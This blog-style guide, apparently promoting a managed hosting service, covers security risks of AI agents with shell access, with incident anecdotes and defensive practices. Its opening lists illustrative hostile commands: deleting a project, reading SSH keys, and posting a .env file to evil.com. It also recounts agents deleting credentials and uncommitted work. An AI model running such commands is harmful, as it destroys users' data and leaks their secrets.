AI Agent Security: What You Need to Know Before Giving AI Access to Your System
Your AI assistant can run any terminal command on your server. That's powerful — and dangerous. An honest guide to AI agent security: real risks, real incidents, and how to protect yourself.
TL;DR: AI agents like OpenClaw can run terminal commands, edit files, and interact with external services. That makes them incredibly useful — and genuinely risky if you're not careful. This guide covers real incidents, current safeguards, and practical steps to protect yourself. No fear-mongering, just facts.
The Reality
Let's start with the uncomfortable truth: when you give an AI agent access to your system, you're giving it the ability to run any command your user account can run.
OpenClaw's exec tool lets the AI execute shell commands. That's how it installs packages, manages files, runs scripts, checks system status, and does the hundred other useful things that make it more than a chatbot.
But "any command" means any command:
rm -rf /home/user/important-project # Delete your work
cat ~/.ssh/id_rsa # Read your SSH keys
curl -X POST https://evil.com -d @~/.env # Exfiltrate secrets
sudo shutdown -h now # Turn off your server
The AI won't do these things on purpose. It's not malicious. But AI agents make mistakes, and mistakes with shell access have consequences.
Real Incidents
These aren't hypothetical. They're from GitHub issues and community reports.
The OAuth Credential Deletion
An OpenClaw agent was troubleshooting an authentication issue. The user asked it to "fix the auth problem." The agent's chain of reasoning went something like:
- Auth is failing → check the credentials file
- The credentials look wrong → they might be corrupted
- Delete the corrupted credentials and re-generate them
- Deleted the OAuth credentials file
- Couldn't re-generate them because it didn't have the original client secret
Result: the user had to manually re-create OAuth credentials from their provider's dashboard. Not catastrophic, but annoying and avoidable.
The Aggressive Cleanup
An agent was asked to "clean up the project directory." It interpreted this broadly:
- Removed node_modules/ (fine, can reinstall)
- Removed build artifacts (fine)
- Removed the .env file (not fine — contained API keys)
- Removed uncommitted changes it considered "temporary" (definitely not fine)
The Infinite Loop
An agent was running a script that it also had permission to modify. The script hit an error, the agent "fixed" the script, which introduced a new error, which the agent "fixed" again. This went on for 47 iterations before hitting the API rate limit.
No data was lost, but the API bill was notable.
Current Safeguards
OpenClaw has some protections. Let's be honest about what exists and what doesn't.
What Exists
Exec security modes. OpenClaw supports security modes for the exec tool:
- full — The AI can run any command. This is the default, and it's what most people use because it's the most capable.
- deny — The exec tool is disabled entirely. The AI can't run any commands. Safe, but severely limits what the AI can do.
AGENTS.md guardrails. The agent's instruction file tells it to prefer trash over rm, ask before destructive operations, and avoid exfiltrating data. These are behavioral guidelines — the AI follows them most of the time, but they're not enforced by code.
Sandboxing. lobsterfarm instances run in isolated environments. Even if the AI goes rogue, it can only affect its own sandbox — not other users' instances, not the host system.
File-level permissions. Standard Unix permissions apply. If the user account doesn't have access, neither does the AI.
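One practical way to lean on this: run the agent under its own unprivileged account, so standard permissions keep it out of your files. A minimal sketch; the username is an example, and the account-creation step needs root so it's shown as a comment:

```shell
# Sketch: create a dedicated unprivileged account for the agent
# (requires root, shown as a comment; the username is an example):
#   useradd --create-home --shell /bin/bash openclaw-agent
#
# Then make your own home directory unreadable to that account.
# Demonstrated here on a throwaway directory instead of /home/youruser:
d=$(mktemp -d)        # stand-in for your real home directory
chmod 700 "$d"        # owner only: no other account can read or enter it
stat -c '%a' "$d"     # prints the mode: 700
```

Mode 700 means only the owner (you) can list, read, or enter the directory, so even a confused agent running as the other account simply gets "permission denied."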
What's Missing
No command allowlist. There's no way to say "the AI can run git and npm but not rm or curl." It's all or nothing. A granular allowlist — where you specify exactly which commands the AI can use — is a frequently requested feature that hasn't been implemented yet.
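Until that lands, you can approximate an allowlist yourself with a wrapper that the agent is instructed (via AGENTS.md) to route commands through. This is a sketch of the idea, not an OpenClaw feature: the function name and the command list are illustrative, and a confused or determined agent could still bypass it by calling commands directly.

```shell
# Sketch of a command allowlist wrapper -- not an OpenClaw feature.
# Only commands named in ALLOWED are executed; everything else is refused.
ALLOWED="git npm ls cat grep"

run_allowed() {
  cmd="$1"
  shift
  for ok in $ALLOWED; do
    if [ "$cmd" = "$ok" ]; then
      "$cmd" "$@"
      return $?
    fi
  done
  echo "blocked: $cmd" >&2
  return 1
}

run_allowed ls /tmp                            # allowed: runs normally
run_allowed curl https://example.com || true   # refused: prints "blocked: curl"
```

The weakness is obvious: it's advisory, not enforced. That's exactly why a built-in allowlist keeps getting requested.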
No human-in-the-loop for dangerous commands. The AI doesn't pause and ask "Should I really delete this?" for destructive operations. The AGENTS.md guidelines say it should, but there's no technical enforcement.
No audit trail (by default). OpenClaw logs AI actions, but there's no built-in dashboard that shows "here's every command your AI ran today" in a reviewable format. You can check the logs manually, but most people don't.
No rollback. If the AI deletes or modifies something, there's no automatic undo. Whatever backups you have are your safety net.
Best Practices
Here's how to reduce risk without giving up the power of an AI agent.
1. Run It on a Separate Server
This is the single most important thing you can do. Don't run your AI agent on your personal machine or your production server.
Use a dedicated VPS or a lobsterfarm instance. If the AI breaks something, it breaks a sandbox — not your laptop with 10 years of photos and your company's production database.
Cost: a Hetzner VPS is €4-8/month. That's extremely cheap insurance.
2. Back Up Regularly
Automated backups are non-negotiable. If the AI deletes something important, you need to be able to restore it.
# Simple daily backup via cron
0 3 * * * tar -czf /backup/openclaw-$(date +%Y%m%d).tar.gz /home/user/clawd/
Better yet, use a backup service that maintains multiple versions so you can restore from any point in time.
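If you manage backups yourself with the cron approach above, also add a retention step so old archives don't silently fill the disk. A sketch, assuming the path and naming pattern from the cron job above:

```shell
# Sketch: delete backups older than 14 days.
# Path and filename pattern match the cron job above; adjust to yours.
BACKUP_DIR=/backup
[ -d "$BACKUP_DIR" ] && find "$BACKUP_DIR" -name 'openclaw-*.tar.gz' -mtime +14 -delete || true
```

Run it from the same crontab, e.g. right after the backup job.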
3. Review Agent Actions
Make a habit of checking what your AI has been doing. Check the logs periodically:
openclaw gateway logs | grep "exec\|tool_use"
Look for anything unexpected. Over time, you'll develop a sense of what's normal and what's not.
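If you'd rather see a summary than read raw logs, a small pipeline can tally which commands the agent runs most. The log format here is an assumption, not OpenClaw's actual format — adjust the pattern to whatever your logs contain:

```shell
# Sketch: count the agent's most-used commands from log text on stdin.
# ASSUMPTION: log lines contain 'exec: <command> ...'; adjust the
# pattern to your real log format before relying on this.
tally_exec() {
  grep -o 'exec: [a-zA-Z_-]*' | sort | uniq -c | sort -rn
}

# Usage (hypothetical): openclaw gateway logs | tally_exec
```

An unfamiliar command suddenly appearing near the top of that list is exactly the kind of anomaly worth investigating.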
4. Use Version Control
Keep your workspace in a git repository. If the AI modifies files in unexpected ways, you can see exactly what changed and revert:
git diff # What changed?
git checkout -- . # Revert everything
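You can take this further with periodic snapshot commits, so there is always a recent known-good state to roll back to. A sketch; the helper name, script path, and schedule are illustrative:

```shell
# Sketch: commit a snapshot of a workspace; run it from cron, e.g. hourly.
snapshot() {
  repo="$1"
  git -C "$repo" add -A
  # --quiet keeps cron noise down; '|| true' makes "nothing changed" a no-op
  git -C "$repo" commit -m "auto-snapshot $(date -u +%Y-%m-%dT%H:%MZ)" --quiet || true
}

# Example crontab entry (hourly, illustrative path):
# 0 * * * * /usr/local/bin/snapshot.sh /home/user/clawd
```

With hourly snapshots, the worst case after an AI mishap is losing an hour of uncommitted work rather than everything.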
5. Limit API Keys
Don't put your most sensitive API keys on the same server as your AI agent. If the AI needs specific API access, give it dedicated keys with minimal permissions.
For example: if the AI needs to read your calendar, give it a read-only calendar API key — not your full Google account credentials.
6. Keep AGENTS.md Tight
The instructions in AGENTS.md genuinely work — the AI reads and follows them. Add explicit rules:
## Safety Rules
- NEVER delete files without asking first
- NEVER modify .env or credential files
- NEVER run commands with sudo
- Always use `trash` instead of `rm`
- Ask before any command that touches production data
This isn't bulletproof, but it dramatically reduces accidental damage.
Running on a Managed Service
Running your AI agent on a dedicated server — whether self-hosted or managed — is inherently safer than running it on your personal machine:
- Isolation. The AI can't affect your personal files, photos, or SSH keys
- It's not your laptop. If the AI deletes something, it's on a server — not your machine with 10 years of documents
- Separation. Your AI agent has its own environment. It can't accidentally trash your personal files because they aren't there
lobsterfarm provides managed OpenClaw hosting with deployment, updates, and support. A dedicated VPS works too — the key is keeping the agent off your personal machine.
The Honest Take
AI agents are powerful tools with real risks. The current state of security in the ecosystem — not just OpenClaw, but AI agents generally — is immature. We're in the early days of figuring out how to give AI meaningful system access without meaningful system risk.
The good news: the risks are manageable. A separate server, regular backups, and periodic review of agent actions will protect you from the vast majority of issues.
The bad news: there's no silver bullet yet. Command allowlists, human-in-the-loop confirmation, and proper audit trails are all needed and not yet standard.
Use AI agents. They're genuinely transformative. But use them with your eyes open.
Skip the setup. Start using your AI assistant today.
lobsterfarm gives you a fully managed OpenClaw instance — one click, your own server, running 24/7.